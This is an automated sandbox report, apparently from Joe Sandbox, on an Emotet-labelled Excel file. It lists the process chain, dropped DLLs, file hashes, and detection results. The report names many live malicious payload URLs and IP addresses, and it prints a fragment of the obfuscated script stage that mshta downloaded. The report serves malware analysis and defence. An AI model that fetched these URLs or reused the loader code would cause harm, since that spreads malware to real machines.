    IP/domain: 91.240.118.168, 49165, 49166, 80 GLOBALLAYERNL unknown
• powershell.exe
    IP/domain: www.yeald.finance 94.130.116.76, 443, 49167 HETZNER-ASDE Germany
    dropped: C:\Users\Public\Documents\ssd.dll, PE32
    Signature: Powershell drops PE file
• cmd.exe
• rundll32.exe
• rundll32.exe
    dropped: C:\Windows\...\jxnctwsmnhcex.tox (copy), PE32
    Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
• rundll32.exe
• rundll32.exe
    Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
• rundll32.exe

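| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| imedpub.com_10.xls | 30% | ReversingLabs | Document-Excel.Trojan.Emotet | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\Public\Documents\ssd.dll | 100% | Joe Sandbox ML | | |
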
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| www.yeald.finance | 9% | Virustotal | | Browse |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| www.yeald.finance | 94.130.116.76 | true | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://www.yeald.finance/wp-admin/1WgPRm/ | true | Avira URL Cloud: malware | unknown |
| http://91.240.118.168/zzx/ccv/fe.html | true | Avira URL Cloud: malware | unknown |
| http://91.240.118.168/zzx/ccv/fe.png | true | Avira URL Cloud: malware | unknown |

                            unknown
                            http://91.240.118.168/zzx/ccv/fe.html6mshta.exe, 00000004.00000002.433277955.000000000039E000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://www.protware.com/mshta.exe, 00000004.00000002.433840296.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433713117.000000000312B000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418141010.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417223440.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432232024.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432985416.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418629434.000000000321F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.protware.com/Amshta.exe, 00000004.00000003.417168851.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433813182.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432328982.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432086271.00000000031CC000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://sneakadream.com/wp-contenpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://tanquessepticos.com/wp-apowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://sneakadream.com/wp-content/pccmAOq/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://www.yeald.financepowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://www.yeald.finance/wp-admin/1WgPRm/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://91.240.118.168/zzx/ccv/fe.htmlBimedpub.com_10.xls.0.drtrue
                            • Avira URL Cloud: malware
                            unknown
                            http://91.240.118.168/zzx/ccv/fe.htmlhttp://91.240.118.168/zzx/ccv/fe.htmlmshta.exe, 00000004.00000003.419030609.0000000002A65000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://tattooblog.cn/wp-includespowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://masboni.cpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://allaagency.ro/wp-admin/7powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://ocsp.entrust.net0Dpowershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://91.240.118.168/zzx/ccv/fe.htmlWinSta0mshta.exe, 00000004.00000002.433261610.0000000000360000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://91.240.118.168/zzx/ccv/fe.htmlC:mshta.exe, 00000004.00000002.433356985.0000000000419000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://chochungcuhanoi.com/wp-cpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://palankhir.hu/tools/GJRNhZHz/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://masboni.com/wp-admin/3zUQl/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://falah.org.pk/vegasvulkanpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://weddingbandsirelandjbk.cpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://91.240.118.168/zzx/ccv/fepowershell.exe, 00000006.00000002.674371318.00000000035B1000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://weddingbandsirelandjbk.com/hgsynt2/o/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://crl.entrust.net/server1.crl0powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672271946.0000000000411000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.168/zzx/ccv/fe.htmlmshtamshta.exe, 00000004.00000002.433261610.0000000000360000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.168/zzx/ccv/fe.htmlsEmshta.exe, 00000004.00000002.433277955.000000000039E000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://sneakadream.com/wp-content/pccmAOq/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://160.16.102.168/rundll32.exe, 0000000F.00000002.672219748.00000000003DB000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://91.240.118.168/zzx/ccv/fe.pngPE3powershell.exe, 00000006.00000002.674371318.00000000035B1000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://www.protware.commshta.exe, 00000004.00000002.433399492.000000000044B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417104414.000000000317F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417168851.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418402237.000000000317F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432916821.0000000003180000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433813182.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432328982.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432944579.000000000313F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417763743.000000000317F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432086271.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433727855.000000000313F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://starspeedng.com/One-File/U3Trml/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              unknown
                              https://getcode.info/wp-content/QDx8b5j/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.168powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.674371318.00000000035B1000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              unknown
                              http://www.piriform.com/ccleanerpowershell.exe, 00000006.00000002.672090023.000000000025C000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://160.16.102.168:80/Tepiarundll32.exe, 0000000F.00000002.672219748.00000000003DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://allaagency.ro/wp-admin/7/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://getcode.info/wp-content/QDx8b5j/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://91.240.118.168/zzx/ccv/fe.htmlv1.0YAmshta.exe, 00000004.00000003.417104414.000000000317F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433793500.00000000031A2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432391845.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417832916.0000000003198000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418463875.000000000319E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417270436.0000000003188000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://secure.comodo.com/CPS0powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677710900.000000001B449000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.672134847.000000000029F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672271946.0000000000411000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://masboni.com/wp-admin/3zUQpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://crl.entrust.net/2048ca.crl0powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://allaagency.ro/wp-admin/7/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 562396
Start date: 28.01.2022
Start time: 20:50:05
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 25s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: imedpub.com_10.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@21/13@1/47
EGA Information:
• Successful, ratio: 75%
HDC Information:
• Successful, ratio: 24.2% (good quality ratio 20.9%)
• Quality average: 66.5%
• Quality standard deviation: 32.1%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 51
• Number of non-executed functions: 198
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 93.184.221.240, 92.123.101.218, 92.123.101.179
• Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, wu-shim.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu.azureedge.net, download.windowsupdate.com.edgesuite.net
• Execution Graph export aborted for target mshta.exe, PID 1176 because there are no executed function
• Execution Graph export aborted for target powershell.exe, PID 2128 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
20:52:21 | API Interceptor | 57x Sleep call for process: mshta.exe modified
20:52:24 | API Interceptor | 436x Sleep call for process: powershell.exe modified
20:52:40 | API Interceptor | 145x Sleep call for process: rundll32.exe modified
                                                                                                                    Match | Associated Sample Name / URL | Detection
                                                                                                                    C:\Users\Public\Documents\ssd.dll | iMedPub LTD_10.xls | malicious
                                                                                                                    C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox (copy) | iMedPub LTD_10.xls | malicious
                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):61414
                                                                                                                        Entropy (8bit):7.995245868798237
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                                        MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                                        SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                                        SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                                        SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                                        Malicious:false
                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):328
                                                                                                                        Entropy (8bit):3.1244568012511515
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:kKTXWk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:bXW9kPlE99SNxAhUeYlUSA/t
                                                                                                                        MD5:AB1C8979C81A5CB6BC431938BE60FB83
                                                                                                                        SHA1:6FDC39902F41B95BE31259D33E692F509EDE7336
                                                                                                                        SHA-256:5FB1211AF015014FF42C8BCF0847038AB35D81A4F600BC1A0B286022A2B34578
                                                                                                                        SHA-512:A8EACC963409BD8D058EACD8EE62A83D99A064332CFDDD060897DFF5E8CD6FB93FABA402B14350A65FF2CF3403EDA05D8A4DE1452AC8A829E4AD25AD7541F8DE
                                                                                                                        Malicious:false
                                                                                                                        Preview:p...... ..........#.....(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...
                                                                                                                        Process:C:\Windows\System32\mshta.exe
                                                                                                                        File Type:data
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):11101
                                                                                                                        Entropy (8bit):6.2008748618289005
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:aYsCkQua+4prGY1KEI7HhGmx72lurMSwpHJhd519YxsZV29Zjyjtx7q0m3OWXKYn:aYJksvpr7+7HhGI2lurD+39r2/ji3uwK
                                                                                                                        MD5:23440BCB46916D8BE91E6EADECADC6FD
                                                                                                                        SHA1:3828BC25F5EEEE28119B0AA47E901BD95FD018D2
                                                                                                                        SHA-256:96DCD43ADCA49FE6DE55A1D3514F29462C06E52CA00F0A61098E26A17C33E5C3
                                                                                                                        SHA-512:E5B7CCF5B65AEFDA08045FAEDB359ABE667DD4C9BDC894BDD938FC72B44D0D2D1F210AFC0605A5D4176839C83A51AC95E563F518D4D062AB26BAEA56F74B66D2
                                                                                                                        Malicious:false
                                                                                                                        IE Cache URL:http://91.240.118.168/zzx/ccv/fe.html
                                                                                                                        Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';oA5T24jEdxmH8=new Array();uySMoq2S5sfDQ=new Array();uySMoq2S5sfDQ[0]='\164%33\103\146\153r%38\111' ;oA5T24jEdxmH8[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.%.7.6.a}..2.%.2
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1536
                                                                                                                        Entropy (8bit):1.1464700112623651
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                        MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                        SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                        SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                        SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                        Malicious:false
                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):61414
                                                                                                                        Entropy (8bit):7.995245868798237
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                                        MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                                        SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                                        SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                                        SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                                        Malicious:false
                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        File Type:data
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):161595
                                                                                                                        Entropy (8bit):6.302448239972517
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:FlYXleUpAR73k/99oFr+yQNujWNWv+1w/A/rHeGyjYPjCQarsmt6Q/GM:F+X7ARcqhQNujZv+mQjCjrsSP
                                                                                                                        MD5:D99661D0893A52A0700B8AE68457351A
                                                                                                                        SHA1:01491FD23C4813A602D48988531EA4ABBCDF7ED9
                                                                                                                        SHA-256:BDD5111162A6FA25682E18FA74E37E676D49CAFCB5B7207E98E5256D1EF0D003
                                                                                                                        SHA-512:6F2291CA958CBF5423CBBE570FD871C4D379A435BE692908CAAACF4C2A68BD81008254802D4F4B212165E93B126ED871A62EAF3067909EB855B29573FC325B8E
                                                                                                                        Malicious:false
                                                                                                                        Preview:0..w6..*.H.........w&0..w!...1.0...`.H.e......0..g5..+.....7.....g%0..g 0...+.....7.........\.H....211018201437Z0...+......0..f.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):28672
                                                                                                                        Entropy (8bit):2.6640799752823963
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:kAFN3+g+Hymsbck3hbdlylKsgqopeJBWhZFGkE+cML:kI+Hymsbck3hbdlylKsgqopeJBWhZFGM
                                                                                                                        MD5:CEE3614693EB53F7293A3C223BC2FA4F
                                                                                                                        SHA1:B36D0659E465A68B397C241E7AB0E86E0AD398E7
                                                                                                                        SHA-256:B65D8C27161E97571ECF348B002A50D158C345F9DA3F4FE04FA26C27B2BE59F6
                                                                                                                        SHA-512:A3CF713245FEDF788EC3D584F9763C7FC619982CC60ED733AFFEAFC93F3C1E01C18171BC22F4A93FE50B34DA1A6163F99FB20F9B0842F121C2F458C23C5F8347
                                                                                                                        Malicious:false
                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):512
                                                                                                                        Entropy (8bit):0.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3::
                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                        Malicious:false
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8016
                                                                                                                        Entropy (8bit):3.5832040477947182
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:chQCcMq+qvsqvJCwo5z8hQCcMq+qvsEHyqvJCworfzIuYbHyUVhxlUV7A2:ciHo5z8irHnorfzIQUVh+A2
                                                                                                                        MD5:A97322B899F5E5AD0F8A0677D238B727
                                                                                                                        SHA1:1D1CDD4012A8DD2E17DF676D5F6F44E3CD568046
                                                                                                                        SHA-256:BF7B5438ABB29F5D8A22244836A9FAF1290B1613C7884AB2B651AFDB12BD2033
                                                                                                                        SHA-512:2F91F611AAFF01D9513AD11C9470D452C50BAD0D59B4446F48C54184D0FABAE20ED26CA197AEA2299D2DCDF3879B9046BFB89F9B874FCC301548D8E107AAA0E2
                                                                                                                        Malicious:false
